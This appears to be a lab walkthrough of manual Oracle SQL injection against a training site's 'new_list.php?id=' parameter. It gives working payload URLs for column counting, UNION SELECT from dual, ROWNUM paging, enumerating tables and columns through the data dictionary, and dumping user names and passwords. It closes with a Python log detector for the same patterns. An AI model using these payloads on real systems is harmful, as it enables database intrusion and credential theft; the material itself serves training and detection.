0x01 Determining the injection type, narrowing down the column count, and UNION queries
Determining the type
Site link: http://219.153.49.228:44714/new_list.php?id=1
Database statement: select * FROM CLASSINFO WHERE CLASSID='88'
Assume the parameter is string-typed: append a single quote after the parameter so that the quotes close on both sides, then continue with the following steps.
Normally two single quotes should close the quotes on both sides, but here the page is still in an error state, which proves that the database statement at this point actually looks like this: select * FROM CLASSINFO WHERE CLASSID=88''
So this is a numeric-type injection.
Guessing the column count
Site link: http://219.153.49.228:40466/new_list.php?id=1 order by 2 (correct)
Database statement: select * FROM CLASSINFO WHERE CLASSID=88 order by 2
Site link: http://219.153.49.228:40466/new_list.php?id=1 order by 3 (error)
Database statement: select * FROM CLASSINFO WHERE CLASSID=88 order by 3
Error message: "ORDER BY item must be the number of a SELECT-list expression". In other words, the ORDER BY position must be a number within the SELECT list's column count: once it exceeds the number of columns in the current query an error is raised, and when it is less than or equal to that number the result is true, i.e. the page renders correctly.
UNION queries
Oracle is strict about data types. When performing a UNION query, the added SELECT has to follow the data types of the columns in the current table; in Oracle, null can be used in place of either a string or a number.
Site link: http://219.153.49.228:46651/new_list.php?id=1 union select null,null from dual
Database statement: select * FROM CLASSINFO WHERE CLASSID=88 union select null,null from dual

If there are not many fields, it is still recommended to determine the type of each column.
http://219.153.49.228:46651/new_list.php?id=1 union select 1,2 from dual (page error)
http://219.153.49.228:46651/new_list.php?id=1 union select '1',2 from dual (page error)
http://219.153.49.228:46651/new_list.php?id=1 union select 1,'2' from dual (page error)
http://219.153.49.228:46651/new_list.php?id=1 union select '1','2' from dual (page normal)
0x02 Pagination and filtering in queries, enumerating databases and tables
Oracle differs from MySQL: there is no LIMIT for pagination; instead, pagination is implemented with three levels of nested queries.
Example: SELECT * FROM ( SELECT A.*, ROWNUM RN FROM (select * from session_roles) A WHERE ROWNUM <= 1 ) WHERE RN >= 0
Pagination
Site link: http://219.153.49.228:47653/new_list.php?id=1 union select '1',(SELECT BANNER FROM ( SELECT A.*, ROWNUM RN FROM (select banner from sys.v_$version) A WHERE ROWNUM <= 99 ) WHERE RN >= 1 and rownum=1) from dual
Database statement: select * FROM CLASSINFO WHERE CLASSID=88 union select null,(SELECT BANNER FROM ( SELECT A.*, ROWNUM RN FROM (select banner from sys.v_$version) A WHERE ROWNUM <= 99 ) WHERE RN >= 1 and rownum=1) from dual
Filtering in queries
Oracle has several ways to write not-equals: <>, !=, ^=
Site link: http://219.153.49.228:47653/new_list.php?id=1 union select '1',(select banner from sys.v$version where rownum=1 and banner<>'Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production') from dual
Database statement (the database version differs, so the statement differs): select * FROM CLASSINFO WHERE CLASSID=88 union select 1,(select banner from sys.v$version where rownum=1 and banner<>'Oracle Database 11g Enterprise Edition Release 11.2.0.1.0 - 64bit Production') from dual
Enumerating databases
Site link: http://219.153.49.228:47653/new_list.php?id=1 union select '1',(select owner from all_tables where rownum=1) from dual
Database statement: select * FROM CLASSINFO WHERE CLASSID=88 union SELECT 1,(select owner from all_tables where rownum=1) from dual
Site link: http://219.153.49.228:47653/new_list.php?id=1 union select '1',(select owner from all_tables where rownum=1 and owner<>'SYS') from dual
Database statement: select * FROM CLASSINFO WHERE CLASSID=88 union select 1,(select owner from all_tables where rownum=1 and owner<>'SYS') from dual
Enumerating tables
Site link: http://219.153.49.228:47653/new_list.php?id=1 union select '1',(select table_name from user_tables where rownum=1) from dual
Database statement: select * FROM CLASSINFO WHERE CLASSID=88 union select 1,(select table_name from user_tables where rownum=1) from dual
To locate the table we need among a large number of tables, here are a few substrings that sensitive table names commonly contain: user, use, name, pass, password
Site link: http://219.153.49.228:48635/new_list.php?id=1 union select '1',(select table_name from user_tables where rownum=1 and table_name like '%USER%') from dual
Database statement: select * FROM CLASSINFO WHERE CLASSID=88 union select 1,(select table_name from user_tables where rownum=1 and table_name like '%USER%') from dual
0x03 Enumerating columns and data
Enumerating column names
Site link: http://219.153.49.228:48635/new_list.php?id=1 union select '1',(select column_name from user_tab_columns WHERE table_name='sns_users' and rownum=1) from dual
Database statement: select * FROM CLASSINFO WHERE CLASSID=88 union select 1,(select column_name from user_tab_columns WHERE table_name='sns_users' and rownum=1) from dual
Enumerating the second column name
Site link: http://219.153.49.228:48635/new_list.php?id=1 union select '1',(select column_name from user_tab_columns WHERE table_name='sns_users' and rownum=1 and column_name<>'USER_NAME') from dual
Database statement: select * FROM CLASSINFO WHERE CLASSID=88 union select '1',(select column_name from user_tab_columns WHERE table_name='sns_users' and rownum=1 and column_name<>'USER_NAME') from dual
Enumerating data
Method one: columns of the same type
Site link: http://219.153.49.228:41883/new_list.php?id=1 union select (select USER_PWD from "sns_users"),(select USER_PWD from "sns_users") from dual. A key point here is why the table name must be enclosed in double quotes; this is critical, so be sure to look at the figure below.
Key property
Roughly, the meaning is: Oracle identifiers are upper case by default. If we enclose a name in double quotes it is treated case-sensitively; if we do not, the system automatically converts it to upper case.
Database statement: select * FROM CLASSINFO WHERE CLASSID=88 union select (select USER_PWD from "sns_users"),(select USER_PWD from "sns_users") from dual
Because this lab range has a problem and cannot execute the query this way, a screenshot from the database is attached instead.
Method two: the CONCAT function and the concatenation operator
Site link: http://219.153.49.228:41883/new_list.php?id=1 and 1=2 union SELECT CONCAT(user_name,USER_PWD),'2' FROM "sns_users"
Database statement: select * FROM CLASSINFO WHERE CLASSID=88 and 1=2 union SELECT CONCAT(user_name,USER_PWD),'2' FROM "sns_users"
Concatenation operator (||)
Site link: http://219.153.49.228:41883/new_list.php?id=1 and 1=2 union SELECT user_name||USER_PWD,'2' FROM "sns_users"
Database statement: select * FROM CLASSINFO WHERE CLASSID=88 and 1=2 union SELECT user_name||USER_PWD,'2' FROM "sns_users"
Method three: the normal way of selecting fields
Site link: http://219.153.49.228:41883/new_list.php?id=1 and 1=2 union SELECT user_name,USER_PWD FROM "sns_users"
Database statement: select * FROM CLASSINFO WHERE CLASSID=88 and 1=2 union SELECT user_name,USER_PWD FROM "sns_users"
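From the defensive side, every step above leaves a distinctive trace in the web server's access log: ORDER BY column probing, UNION ... FROM dual, ROWNUM row selection, the Oracle data-dictionary views and the <>/!=/^= exclusion filters. The following detector is an added example written for this page, not code from the lab range or its author; the log lines are constructed samples in combined log format, and the rule names and the 10.0.0.x addresses are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Oracle-specific injection indicators, one per technique shown in this write-up.
# Each regex runs over the URL-decoded, lower-cased query string of a request.
RULES = [
    ("order_by_probe",    re.compile(r"\border\s+by\s+\d+")),            # column-count probing
    ("union_from_dual",   re.compile(r"union\s+select\b.*\bfrom\s+dual\b")),
    ("rownum_paging",     re.compile(r"\brownum\s*(<=|>=|=|<|>)")),       # ROWNUM row selection
    ("oracle_dictionary", re.compile(r"\b(all_tables|user_tables|user_tab_columns|sys\.v_?\$version)\b")),
    ("not_equal_filter",  re.compile(r"\b(banner|owner|table_name|column_name)\s*(<>|!=|\^=)\s*'")),
    ("always_false",      re.compile(r"\band\s+1\s*=\s*2\b")),
]

# Request line of a combined-format access log: client ip, request target, status code.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')

def classify(line):
    """Return (client_ip, status, [matched rule names]) for one log line, or None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, target, status = m.group(1), m.group(2), int(m.group(3))
    decoded = unquote_plus(target.partition("?")[2]).lower()
    return ip, status, [name for name, rx in RULES if rx.search(decoded)]

def scan(lines):
    """Collect the set of triggered rules per client, ignoring lines that hit nothing."""
    per_client = {}
    for line in lines:
        result = classify(line)
        if result and result[2]:
            per_client.setdefault(result[0], set()).update(result[2])
    return per_client

# Constructed sample log lines (not captured from the lab range); the payloads mirror this page.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /new_list.php?id=1 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /new_list.php?id=1%20order%20by%203 HTTP/1.1" 500 0',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /new_list.php?id=1%20union%20select%20null,null%20from%20dual HTTP/1.1" 200 640',
    '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /new_list.php?id=1%20union%20select%20%271%27,(select%20owner%20from%20all_tables%20where%20rownum=1%20and%20owner%3C%3E%27SYS%27)%20from%20dual HTTP/1.1" 200 650',
]

if __name__ == "__main__":
    for ip, rules in scan(SAMPLE_LOG).items():
        print(ip, sorted(rules))
```

A single client tripping several of these rules in sequence, especially an ORDER BY probe returning 500 followed by UNION queries returning 200, is the pattern of the manual walkthrough above and is worth an alert on its own.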
